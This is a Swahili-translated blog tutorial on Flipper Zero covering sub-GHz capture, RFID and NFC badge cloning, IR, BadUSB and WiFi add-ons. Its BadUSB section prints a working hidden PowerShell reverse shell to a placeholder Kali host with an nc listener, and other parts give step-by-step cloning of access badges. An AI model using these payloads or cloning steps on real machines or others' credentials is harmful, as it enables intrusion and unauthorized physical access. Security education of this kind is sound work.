Menyu
Kuhusu Huduma Safari Fanya Kazi Nami
Maelezo ya picha: Circuit board close-up
Usalama Mac 6, 2026 • Dakika 22 za kusoma

Toleo lililotafsiriwa: Flipper Zero Mastery: Every Protocol, Every Trick

Maelezo yaliyotafsiriwa: Sub-GHz, RFID, NFC, BadUSB, GPIO—master every Flipper Zero capability with hands-on projects. Your work badge is less secure than you think.

Shiriki:
Lee Foropoulos

Lee Foropoulos

Dakika 22 za kusoma

Njia ya Hacker: Mfululizo wa Sehemu 5

Sehemu ya 1: UtanguliziSehemu ya 2: Umahiri wa FlipperSehemu ya 3: Misingi ya KaliSehemu ya 4: UnyonyajiSehemu ya 5: Ukaguzi Kamili

Katika Sehemu ya 1, ulifanya hatua zako za kwanza. Ulinakili rimoti za IR, ukaskani kadi za NFC, ukaangalia spektramu ya sub-GHz ikiangazwa, na ukaandika "Hello World" kwa BadUSB. Uliona kwamba usalama mara nyingi ni udanganyifu tu.

Sasa tunaingia kwa undani. Kufikia mwisho wa makala hii, utaelewa kila protokali kuu ambayo Flipper Zero yako inaweza kuingiliana nayo. Si tu jinsi ya kuzitumia, bali kwa nini zinafanya kazi jinsi zinavyofanya na maana yake kwa usalama.

Onyo la haki: Utagundua kwamba mambo kadhaa uliyodhani ni salama... si salama.

Falsafa ya Flipper

Kabla ya kuingia kwenye protokali, tuweke mtazamo sahihi. Flipper Zero si "kifaa cha hacking" kwa maana ya Hollywood. Ni chombo cha kujifunza kinachokuruhusu kuingiliana na masafa ya redio na protokali za vifaa ambavyo kawaida havionekani.

Fikiria kama kioo cha kukuza kwa ishara za wireless. Ishara zilikuwa pale kila wakati. Hukuweza kuziona tu. Sasa unaweza.

Tofauti hii ni muhimu kwa sababu inabadilisha jinsi unavyokaribia usalama. "Usalama" wengi unategemea kufichwa, dhana kwamba washambuliaji hawatajua jinsi ya kuingiliana na mfumo. Flipper yako inaondoa kufichwa huko. Inakuonyesha kwa usahihi kile kinachotumwa na kupokelewa. Na mara tu unapoweza kuona, unaweza kutathmini kama usalama wa kweli upo.

"Usalama" wengi unategemea kufichwa, dhana kwamba washambuliaji hawatajua jinsi ya kuingiliana na mfumo. Flipper yako inaondoa kufichwa huko.

Habari za ndani: Mara nyingi, usalama wa kweli haupo.

⚠️ Kumbusho: Vifaa Vyako Tu

Kila kitu katika makala hii ni kwa ajili ya kupima vifaa, kadi, na mifumo YAKO MWENYEWE. Mbinu hizi zinafanya kazi kwenye vitu vya mtu yeyote, hiyo ndiyo hoja. Lakini kuzitumia kwenye mifumo usiyomiliki ni kinyume cha sheria. Pima usalama wako mwenyewe. Gundua udhaifu wako mwenyewe. Hiyo ndiyo njia.

Sub-GHz: Spektramu Isiyoonekana

Masafa ya redio chini ya gigahertz yako kila mahali. Mlango wako wa gereji, kipini cha ufunguo wa gari, kituo cha hali ya hewa, kengele ya mlango isiyo na waya, sensori za shinikizo la matairi, vifaa vya nyumba mahiri. Vyote vinatuma kila wakati katika bendi za masafa chini ya 1 GHz.

Kwa nini sub-GHz? Masafa ya chini yanasafiri mbali zaidi na kupenyeza kuta vizuri zaidi kuliko masafa ya juu kama WiFi (2.4/5 GHz). Hii inazifanya kuwa kamili kwa vifaa vinavyohitaji mawasiliano ya kuaminika kwa umbali bila mahitaji ya mstari wa kuona.

Mandhari ya Masafa

Mikoa tofauti inatumia masafa tofauti kwa sababu ya kanuni:

  • 315 MHz: Amerika Kaskazini. Milango ya gereji ya zamani, vipini vya funguo za gari
  • 390 MHz: Amerika Kaskazini. Milango ya gereji, magari mengine
  • 433.92 MHz: Ulimwenguni kote. Vituo vya hali ya hewa, sensori, vifaa vya Ulaya, bidhaa nyingi za IoT
  • 868 MHz: Ulaya. Nyumba mahiri, LoRa, mita za huduma
  • 915 MHz: Marekani. LoRa, nyumba mahiri, viwandani

Kwa firmware ya Momentum, Flipper yako inaweza kutuma na kupokea katika bendi zote hizi bila kujali eneo lako halisi. Firmware ya kawaida inakuzuia kwenye masafa ya kisheria ya mkoa wako. Hii ni muhimu kwa kujifunza kwa sababu unaweza kuwa na vifaa vinavyofanya kazi kwenye masafa ya "kigeni."

Mradi: Changanua Mlango Wako wa Gereji

Muda: Dakika 15

Utajifunza nini: Tofauti kati ya misimbo tuli na misimbo inayozunguka, na kwa nini ni muhimu

Hatua:

  1. Nenda kwenye Sub-GHz → Read
  2. Simama karibu na gereji yako (si karibu sana hadi mlango ufunguke)
  3. Bonyeza kitufe cha rimoti ya mlango wa gereji
  4. Angalia Flipper ikipokea ishara
  5. Chunguza kilichopokelewa, angalia protokali iliyotambuliwa

Unaweza kuona nini:

  • Princeton, Linear, Chamberlain (ya zamani): Misimbo tuli. Msimbo uleule unatumwa kila wakati. Inaathiriwa na mashambulizi ya kurudia.
  • KeeLoq, Security+ 2.0, Rolling Code: Misimbo inayozunguka. Kila utumaji hutumia msimbo tofauti kutoka mfuatano uliobadilishwa. Haiwezi kurudiwa kwa urahisi.

Ukweli: Ikiwa mlango wako wa gereji unatumia msimbo tuli (mengi yaliyowekwa kabla ya ~2015 yanafanya hivyo), mtu yeyote anayepokea ishara hiyo mara moja anaweza kuirudia milele. Gereji yako inalindwa na dhana kwamba hakuna mtu anayesikiliza. Dhana hiyo imevunjika sasa hivi.

Misimbo Inayozunguka Imeelezwa

Milango ya gereji ya kisasa na vipini vya funguo za gari hutumia misimbo inayozunguka (pia inaitwa misimbo ya kuruka). Jinsi inavyofanya kazi:

  1. Mtumaji (rimoti yako) na mpokeaji (gereji yako) wanashiriki mbegu ya siri na algorithm
  2. Kila bonyezo la kitufe linazalisha msimbo unaofuata katika mfuatano uliosawazishwa
  3. Mpokeaji anakubali msimbo wa sasa AU yeyote kati ya misimbo ~256 inayofuata (kushughulikia mabonyezo nje ya masafa)
  4. Mara msimbo unapotumika, unabatilishwa milele

Hii inamaanisha kupokea na kurudia ishara ya msimbo unaozunguka haifanyi kazi. Wakati unapoirudia, msimbo tayari umebatilishwa.

Kwa Nini Hii ni Muhimu

Misimbo inayozunguka ilivumbuliwa kwa sababu ulimwengu wa sub-GHz uligundua kwamba usalama kupitia kufichwa haufanyi kazi. Mtu fulani aligundua jinsi ya kupokea na kurudia ishara, kwa hivyo tasnia ililazimika kutekeleza usalama wa kweli wa kriptografia. Muundo huu unarudiwa katika kila protokali tutakayojadili: usalama unaongezwa tu baada ya mtu kuonyesha udhaifu.

Mradi: Pokea Data ya Kituo cha Hali ya Hewa

Muda: Dakika 10

Utajifunza nini: Ni data ngapi inayotangazwa bila ulinzi wowote

Hatua:

  1. Nenda kwenye Sub-GHz → Read
  2. Subiri karibu na sensori yoyote ya hali ya hewa isiyo na waya (kipimajoto cha nje, kipimamvua, n.k.)
  3. Nyingi hutuma kila sekunde 30-60
  4. Pokea utumaji
  5. Angalia protokali na data yoyote iliyoondolewa msimbo

Utapata nini: Joto, unyevu, hali ya betri, kitambulisho cha sensori. Yote yanatumwa kwa maandishi wazi. Bila usimbuaji, bila uthibitishaji. Mpokeaji yeyote uliorekebishwa kwenye masafa hayo anapata data yote. Sasa fikiria ni nini kingine kinachotangaza katika jirani yako...

Dhana ya mawimbi ya redio
Spektramu ya redio karibu nawe inafanya kazi kila wakati na utumaji usiosimbwa

RFID: Ulimwengu wa 125kHz

RFID ya masafa ya chini (125kHz) ni teknolojia ya zamani na rahisi zaidi ya kadi za ukaribu. Utaipata katika kadi za usajili wa gym, kadi za ufikiaji wa majengo ya ofisi za zamani, gereji za maegesho, na mifumo ya kuingia ya makazi.

Na usalama wake ni mbaya karibu kote.

Jinsi RFID ya 125kHz Inavyofanya Kazi

Kadi hizi ni passive, hazina betri. Unaposhika moja karibu na kisomaji, uwanja wa umeme wa kisomaji unalisha kadi, na kadi inatuma nambari yake ya kitambulisho. Hiyo tu. Hakuna changamoto-majibu. Hakuna usimbuaji. Tu: "Mimi ni kadi nambari 12345."

Kisomaji kinasema "sawa" na kutoa ufikiaji kwa msingi wa kujua nambari hiyo ya kitambulisho tu.

Unaona tatizo.

Aina za Kawaida za Kadi za 125kHz

  • EM4100: Inayopatikana sana. Inatangaza tu kitambulisho cha biti 40. Usalama sifuri.
  • HID Prox: Kadi ya kawaida zaidi ya ufikiaji wa kampuni. Inatangaza msimbo wa kituo + nambari ya kadi. Usalama sifuri.
  • Indala: Si ya kawaida sana. Usimbaji tofauti lakini tatizo lile lile, hakuna usalama.
  • AWID: Toleo lingine. Udhaifu ule ule wa msingi.

Umegundua muundo? Kadi hizi zote zinatangaza tu kitambulisho. "Usalama" ni kwamba mtu atahitaji vifaa maalum kusoma kitambulisho hicho. Flipper yako ni vifaa hivyo.

Mradi: Nakili Kadi Yako ya Gym

Muda: Dakika 5

Unahitaji nini: Kadi yako ya gym/bwawa/makazi ya 125kHz, kadi tupu ya T5577 ($1-2 kila moja)

Hatua:

  1. Nenda kwenye 125 kHz RFID → Read
  2. Shika kadi yako dhidi ya nyuma ya Flipper (ambapo antenna ya RFID iko)
  3. Subiri usomaji wenye mafanikio. Angalia aina ya kadi na kitambulisho
  4. Hifadhi kadi kwa jina linalotambulika
  5. Kupima uigaji: Saved → Select Card → Emulate
  6. Shika Flipper kwenye kisomaji cha gym yako. Inapaswa kufanya kazi sawa na kadi yako

Kuandika kwenye T5577 tupu:

  1. Nenda kwenye kadi yako iliyohifadhiwa
  2. Chagua Write
  3. Shika kadi tupu ya T5577 kwenye Flipper
  4. Subiri uthibitisho wa kuandika
  5. Sasa una nakala halisi

Kwa nini hii ni muhimu: Mfano mzima wa usalama wa mfumo huo wa kudhibiti ufikiaji umeanguka sasa hivi. Mtu yeyote anayeweza kukaribia kadi yako kwa sekunde mbili anaweza kuinakili. Fikiria kuhusu hilo wakati unapocha mfuko wako kwenye chumba cha kubadilishia nguo cha gym.

T5577: Kadi Yako ya Kichawi

T5577 ni kadi ya RFID inayoweza kuandikwa upya ambayo inaweza kuiga aina nyingi za kadi za 125kHz. Ni kama CD-R tupu kwa kadi za ufikiaji. Unaweza kuandika data ya kadi yoyote juu yake, na inakuwa kadi hiyo.

Nunua pakiti ya 10 kwa majaribio. Ni za bei nafuu na za kusaidia sana kuelewa jinsi teknolojia hii yote ilivyo dhaifu. Unaweza kuandika data ya kadi moja, kuipima, kisha kuandika data ya kadi tofauti. Zote kwenye kadi moja ya kimwili.

Hii Inafichua Nini

"Usalama" wa RFID ya 125kHz ni mchezo wa kuigiza tu. Mifumo hii inadhania huwezi kusoma kadi, huwezi kunakili data, na huwezi kuiandika kwenye kadi nyingine. Dhana zote tatu ni za uwongo kwa vifaa vya watumiaji. Ikiwa mahali pako pa kazi kunatumia kadi za HID Prox (kadi ya kawaida zaidi ya ufikiaji wa kampuni), mfanyakazi yeyote mwenye Flipper anaweza kunakili ufikiaji wa mfanyakazi mwingine yeyote. Acha hilo likae.

Jambo Muhimu

Usalama wa RFID ya 125kHz ni mchezo wa kuigiza tu. Mifumo hii inadhania huwezi kusoma, kunakili, au kuandika upya data ya kadi. Dhana zote tatu ni za uwongo kwa vifaa vya watumiaji vinavyogharimu chini ya $200.

Picha ya karibu ya bodi ya saketi yenye vipengele vya kielektroniki
Kila protokali ya wireless ambayo Flipper yako inagusa inafichua dhana za usalama ambazo mara chache zinastahimili uchunguzi

NFC: Ulimwengu wa 13.56MHz

NFC ya masafa ya juu (13.56 MHz) ni kizazi kipya zaidi. Inasaidia malipo bila kugusa, kadi za ufikiaji za kisasa, mifumo ya usafiri, funguo za hoteli, na malipo ya kugusa ya simu yako.

Habari njema: Kadi zingine za NFC kwa kweli zina usalama wa kweli.

Habari mbaya: Nyingi hazina.

Aina za Kadi za NFC

  • MIFARE Classic: Inapatikana sana katika kadi za ufikiaji, usafiri, hoteli. Inatumia usimbuaji wa umiliki ambao ulivunjwa miaka iliyopita. Inaathiriwa.
  • MIFARE Ultralight: Kadi rahisi zenye usalama mdogo. Mara nyingi hutumiwa kwa tiketi za usafiri za kutumia-na-kutupa.
  • NTAG: Kawaida katika tagi za NFC kwa otomatiki. Kawaida usalama mdogo.
  • MIFARE DESFire: Salama kwa kweli. Inatumia usimbuaji wa AES. Inatumika katika uwekaji wa usalama wa juu wa hivi karibuni.
  • EMV (Kadi za Malipo): Kadi yako ya mkopo. Ina usimbuaji mkali, vikomo vya shughuli, na kugundua udanganyifu.

Mradi: Changanua Kitambulisho Chako cha Kazi

Muda: Dakika 10

Utajifunza nini: Kama mahali pako pa kazi kuna usalama wa kweli au mchezo wa kuigiza wa usalama

Hatua:

  1. Nenda kwenye NFC → Read
  2. Shika kitambulisho chako cha kazi dhidi ya nyuma ya Flipper
  3. Subiri usomaji kukamilika
  4. Chunguza kinachokuonyesha Flipper

Kuelewa matokeo:

  • MIFARE Classic 1K/4K: Kitambulisho chako kinatumia usimbuaji uliovunjwa. Kwa muda na zana sahihi, kinaweza kunakiliwa.
  • MIFARE Ultralight: Usalama mdogo. Mara nyingi inaweza kunakiliwa.
  • MIFARE DESFire: Salama kwa kweli. Utaona data chache.
  • Unknown/Locked: Inaweza kuwa ya umiliki au DESFire. Uchunguzi zaidi unahitajika.
18 years
Since MIFARE Classic encryption was publicly broken in 2008, yet most corporate badges still rely on it.

Ukweli halisi: Vitambulisho vingi vya kampuni bado ni MIFARE Classic. Usimbuaji ulivunjwa hadharani mwaka 2008. Miaka kumi na nane iliyopita. Ikiwa kitambulisho chako kinasema MIFARE Classic, mwajiri wako anaendesha mfumo wa usalama ambao wataalamu wa kriptografia wanaona ni wa kuchekeshwa.

Kunakili UID dhidi ya Kunakili Kamili

Tofauti muhimu: Flipper inaweza kila wakati kusoma na kuiga UID (Unique Identifier) ya kadi, nambari ya serial. Mifumo mingine ya ufikiaji inakagua UID tu. Kwa mifumo hii, uigaji rahisi unafanya kazi.

Mifumo bora zaidi inakagua UID NA data iliyosimbwa iliyohifadhiwa kwenye kadi. Kwa hizi, utahitaji pia kunakili sekta zilizosimbwa. Inawezekana kwa MIFARE Classic (usimbuaji umevunjwa) lakini si kwa DESFire.

Mradi: Uchambuzi wa Kadi ya Ufunguo wa Hoteli

Muda: Dakika 5 (wakati mwingine utakapokuwa hotelini)

Utajifunza nini: Jinsi usalama wa hoteli unavyofanya kazi kwa kweli

Hatua:

  1. Soma kadi yako ya ufunguo wa hoteli kwa NFC → Read
  2. Angalia aina ya kadi
  3. Angalia data gani inayoweza kusomwa

Utapata nini kwa kawaida: Funguo nyingi za hoteli ni MIFARE Ultralight au Classic. Zingine zinaonyesha nambari ya chumba, tarehe ya kutoka, au metadata nyingine katika sekta zinazosomeka. "Usalama" ni kwamba wageni kwa kawaida hawana visomaji vya NFC. Sasa wewe una.

Kadi za Kichawi kwa NFC

Kama T5577 kwa 125kHz, kuna kadi za NFC za "kichawi" kwa 13.56MHz:

  • Gen1 (UID Inayobadilika): Inaweza kuandika UID maalum. Inagundulika na visomaji vingine kama "ya kichawi."
  • Gen2 (CUID): Utangamano bora. Mabadiliko ya UID yanabaki baada ya kuzima.
  • Gen3 (UFUID): Inaweza kufunga UID baada ya kuandika. Inaonekana kama kadi ya kawaida.
  • Gen4 (Ultimate Magic): Yenye kubadilika zaidi. Inaweza kuiga aina nyingi za kadi.

Kwa kujifunza, kadi za Gen2 ni chaguo bora zaidi. Bei nafuu, zinaoana sana, na za kutosha kwa majaribio mengi.

Infrared: Udhibiti Kamili

Tayari uliunda rimoti za IR katika Sehemu ya 1. Tuingie kwa undani zaidi.

Kujenga Maktaba Kamili ya Rimoti

Flipper inaweza kuhifadhi rimoti za IR zisizo na kikomo. Lakini kujifunza kila kitufe kimoja kimoja ni kuchosha. Njia bora: tumia hifadhidata za jamii.

Firmware ya Momentum inajumuisha IRDB, hifadhidata kubwa ya rimoti zilizorekodiwa mapema. Unaweza pia kupakua rimoti kutoka hazina za GitHub na kuziongeza kwenye kadi ya SD ya Flipper.

Mradi: Jenga Arsenal Yako ya IR

Muda: Dakika 20

Hatua:

  1. Kwenye Flipper yako: Infrared → Universal Remotes
  2. Utapata rimoti za jumla zilizojengwa awali kwa TV, AC, projekta, n.k.
  3. Zipime dhidi ya vifaa vyako
  4. Kwa vifaa visivyofunikwa, tumia Learn New Remote
  5. Panga rimoti zilizohifadhiwa kwa chumba au aina ya kifaa

Hatua ya juu: Unda "rimoti za chumba" zinazochanganya vifaa vyote vya IR katika nafasi moja. Faili moja inadhibiti TV, sauti bar, taa, na AC.

Unajifunza nini: IR ni ya ulimwengu na haijalindwa. Kifaa chochote chenye kipokezi cha IR kinaweza kudhibitiwa na kifaa chochote chenye kitumaji cha IR. Hii ni ya makusudi. IR iliundwa kwa urahisi, si usalama. Flipper yako inafanya urahisi huo kuwa wa ulimwengu.

Kupokea IR Raw

Vifaa vingine vinatumia protokali za IR zisizo za kawaida. Kwa hivi, Flipper inaweza kupokea ishara ya raw, muda sahihi wa mapigo ya washa/zima, na kuirudia kwa usahihi.

Nenda kwenye Infrared → Learn New → Raw wakati kujifunza kwa kawaida hakutambui ishara.

BadUSB: Mbadala wa Rubber Ducky

Katika Sehemu ya 1, ulifanya Flipper iandike "Hello World." Sasa tunakuwa wa dhati.

BadUSB (pia inajulikana kama mashambulizi ya USB Rubber Ducky) inatumia kasoro ya msingi katika jinsi kompyuta zinavyoshughulikia vifaa vya USB: zinaamini kibodi bila masharti. Unapounganisha kifaa kinachojidai kuwa kibodi, kompyuta inakubali kila herufi bila swali.

Flipper yako inaweza kuandika takriban herufi 1,000 kwa sekunde. Haraka zaidi kuliko binadamu yeyote. Haraka ya kutosha kutekeleza mashambulizi magumu kabla ya mtu yeyote kuweza kuitikia.

Misingi ya DuckyScript

Mzigo wa BadUSB unatumia DuckyScript, lugha rahisi ya scripting. Amri muhimu:

REM This is a comment
DELAY 1000
STRING Hello World
ENTER
GUI r
ALT F4
CTRL c
TAB
DOWNARROW
ESCAPE

Mradi: Mkusanyaji wa Taarifa za Mfumo

Muda: Dakika 15

Inafanya nini: Inafungua PowerShell, inakusanya taarifa za mfumo, inahifadhi kwenye faili (kwenye kompyuta YAKO)

REM System Info Grabber - Run on YOUR machine only
DELAY 1000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING $info = @{
ENTER
STRING Hostname = $env:COMPUTERNAME
ENTER
STRING Username = $env:USERNAME
ENTER
STRING Domain = $env:USERDOMAIN
ENTER
STRING IP = (Get-NetIPAddress -AddressFamily IPv4).IPAddress
ENTER
STRING OS = (Get-WmiObject Win32_OperatingSystem).Caption
ENTER
STRING }
ENTER
STRING $info | ConvertTo-Json | Out-File "$env:USERPROFILE\Desktop\sysinfo.json"
ENTER
STRING exit
ENTER

Unajifunza nini: Kwa chini ya sekunde 3 za ufikiaji wa kimwili, mshambuliaji anaweza kukusanya jina la mwenyeji, jina la mtumiaji, kikoa, anwani za IP, na toleo la OS. Hii ni upelelezi. Fikiria ni nini kingine kinachoweza kuandikwa katika sekunde hizo 3.

Mradi: Usanidi wa Shell ya Kurudisha

Muda: Dakika 30 (pamoja na usanidi wa Kali)

Inafanya nini: Inaunda muunganisho wa kurudi kwenye mashine yako ya Kali (maandalizi ya Sehemu ya 3)

Mahitaji: Kali Linux inafanya kazi (VM ni sawa), ujue anwani ya IP ya Kali yako

Kwenye Kali, anza msikilizaji:

nc -lvnp 4444

Mzigo wa BadUSB (lengo la Windows):

REM Reverse Shell - Replace KALI_IP with your Kali's IP
DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('KALI_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
ENTER

Kinachotokea: Mashine lengwa inafungua muunganisho wa PowerShell kurudi kwenye sanduku lako la Kali. Sasa una ufikiaji wa mstari wa amri kwenye mashine hiyo. Hii ndiyo msingi wa jinsi ufikiaji wa kimwili + BadUSB = kuathiriwa kamili. Tutachunguza zaidi katika Sehemu ya 3.

⚠️ Mizigo Hii ni Halisi

Mzigo wa shell ya kurudisha hapo juu unafanya kazi kwa kweli. Uitumie TU kwenye mashine unazomiliki kwa majaribio. Kuiendesha kwenye mashine ya mtu mwingine ni uhalifu wa shirikisho (ufikiaji usioruhusiwa + uwekaji wa mlango wa nyuma). Lengo ni kuelewa tishio, si kulitengeneza.

Mizigo ya Kufurahisha kwa Maonyesho

Kwa kuonyesha BadUSB kwa watu wengine (kwenye mashine yao kwa ruhusa), hapa kuna mizigo isiyo na madhara lakini ya kuvutia:

REM Rick Roll - Opens YouTube
DELAY 1000
GUI r
DELAY 500
STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ
ENTER
REM Fake Windows Update - Fullscreen prank page
DELAY 1000
GUI r
DELAY 500
STRING https://fakeupdate.net/win10ue/
ENTER
DELAY 2000
F11
REM Flip Screen Upside Down (Windows)
DELAY 1000
CTRL ALT DOWNARROW

GPIO: Upanuzi wa Vifaa

Pini za GPIO (General Purpose Input/Output) za Flipper zinakuruhusu kuunganisha moduli za nje na kupanua uwezo. Hapa ndipo Flipper inabadilika kutoka chombo cha mkononi hadi jukwaa la maendeleo.

Moduli Lazima

  • WiFi Dev Board: Inaongeza uwezo wa WiFi: kupokea pakiti, majaribio ya deauth, mashambulizi ya Evil Twin. Muhimu kwa Sehemu ya 3 na kuendelea.
  • Antenna ya Nje ya CC1101: Inapanua kwa kiasi kikubwa masafa ya Sub-GHz. Antenna ya ndani inafanya kazi, lakini ya nje ni bora kwa kazi kubwa.
  • ESP32 Marauder: Inabadilisha Flipper kuwa jukwaa la hacking la WiFi/Bluetooth. Inapokea handshake, inaendesha mashambulizi.
  • ProtoBoard: Kwa miradi maalum na kuunganisha vifaa vyako mwenyewe.

Mradi: Usanidi wa WiFi Dev Board

Muda: Dakika 20

Unahitaji nini: WiFi Dev Board (rasmi au ESP32 inayooana)

Hatua:

  1. Flash firmware ya Marauder kwenye ESP32 (maelekezo kwenye github.com/justcallmekoko/ESP32Marauder)
  2. Unganisha kwenye pini za GPIO za Flipper
  3. Nenda kwenye GPIO → ESP32 → Marauder
  4. Sasa una skani ya WiFi, deauth, na kupokea pakiti

Kwa nini hii ni muhimu: Flipper peke yake haiwezi kufanya WiFi, haina vifaa sahihi vya redio. Lakini na dev board, unaweza kuskani mitandao, kupokea WPA handshake, na kutekeleza mashambulizi ya WiFi. Tutatumia hii sana katika Sehemu ya 3 na 4.

Vipengele vya Juu vya Momentum

Ikiwa unaendesha firmware ya Momentum (unapaswa kuwa), hapa kuna vipengele vinavyostahili kuchunguza:

  • Picha za Desktop: Kwa mapambo tu, lakini za kufurahisha. Angalia pakiti za picha za jamii.
  • Protokali Zilizopanuliwa: Momentum inaongeza msaada kwa protokali ambazo firmware ya kawaida haijumuishi.
  • Kituo cha Programu: Programu za ziada zaidi ya kawaida: michezo, zana, huduma maalum.
  • Pakiti za Mali Maalum: Badilisha muonekano na hisia nzima.

Thamani halisi iko katika masafa yaliyofunguliwa na msaada uliopanuliwa wa protokali. Firmware ya kawaida imezuiliwa kwa makusudi kwa kufuata sheria na kanuni. Momentum inadhani wewe ni mtu mzima anayeelewa sheria.

Umejifunza Nini

Sasa unaelewa:

  • Sub-GHz: Jinsi milango ya gereji, vipini vya funguo za gari, na sensori zinavyowasiliana, na kwa nini misimbo inayozunguka ni muhimu
  • RFID ya 125kHz: Kwa nini kadi za gym na vitambulisho vya zamani vinaweza kunakiliwa kwa urahisi
  • NFC ya 13.56MHz: Tofauti kati ya usimbuaji uliovunjwa (MIFARE Classic) na usalama wa kweli (DESFire)
  • Infrared: Jinsi ya kujenga maktaba ya rimoti za ulimwengu na kupokea ishara za raw
  • BadUSB: Kwa nini uaminifu wa USB HID ni udhaifu wa msingi, na jinsi ya kuutumia
  • GPIO: Jinsi ya kupanua hadi WiFi, masafa yaliyopanuliwa, na vifaa maalum

Flipper yako sasa ni silaha. Lakini ni bisibisi ikilinganishwa na Kali Linux, ambayo ni warsha nzima. Wakati wa kuanzisha mazingira halisi ya hacking.

Njia ya Hacker

Mfululizo wa sehemu 5 unaokupeleka kutoka udadisi hadi uwezo.

Sehemu ya 1: Utangulizi Sehemu ya 2: Umahiri wa Flipper ✓ Sehemu ya 3: Misingi ya Kali Sehemu ya 4: Unyonyaji Sehemu ya 5: Ukaguzi Kamili

Orodha ya Ukaguzi ya Sehemu ya 2

☐ Sub-GHz: Mlango wa gereji umechambuliwa, tofauti ya misimbo inayozunguka na tuli imeeleleweka

☐ RFID ya 125kHz: Kadi zimesomwa, angalau nakala moja imejaribiwa

☐ NFC: Kitambulisho cha kazi kimechambuliwa, aina ya kadi imetambuliwa

☐ Infrared: Maktaba kamili ya rimoti za nyumba imejengwa

☐ BadUSB: Mzigo wa taarifa za mfumo umejaribiwa, shell ya kurudisha imeeleleweka

☐ GPIO: WiFi dev board iko tayari kwa Sehemu ya 3

☐ Kadi za Kichawi: T5577 na/au kadi za kichawi za NFC zimenunuliwa kwa majaribio

Flipper Mastery Action Plan 0/6

Kinachofuata

Katika Sehemu ya 3, tunaondoka kwenye uwezo uliolenga wa Flipper na kuingia katika mazingira kamili ya majaribio ya kupenya: Kali Linux.

Utajifunza:

  • Kusanidi maabara yako ya hacking (usakinishaji na usanidi wa VM)
  • Upelelezi wa mtandao na nmap: ramani ya kila kifaa kwenye mtandao wako
  • Upelelezi wa wireless: kupokea WiFi handshake na aircrack-ng
  • Upelelezi wa wavuti: kugundua kile ambacho router yako inafichua
  • Kuunganisha data za Flipper na mtiririko wa kazi wa Kali

Flipper ilionyesha kwamba udhaifu upo. Kali inakusaidia kuelewa kwa usahihi jinsi unavyoenda kwa undani.

Tutaonana katika Sehemu ya 3.

How was this article?

Shiriki

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

Usikose chapisho lolote

Pokea arifa machapisho mapya yanapochapishwa. Hakuna barua pepe inayohitajika.

Utaona bendera kwenye tovuti wakati kuna chapisho jipya, pamoja na arifa ya kivinjari ukiiruhusu.

Arifa za kivinjari tu. Hakuna taka.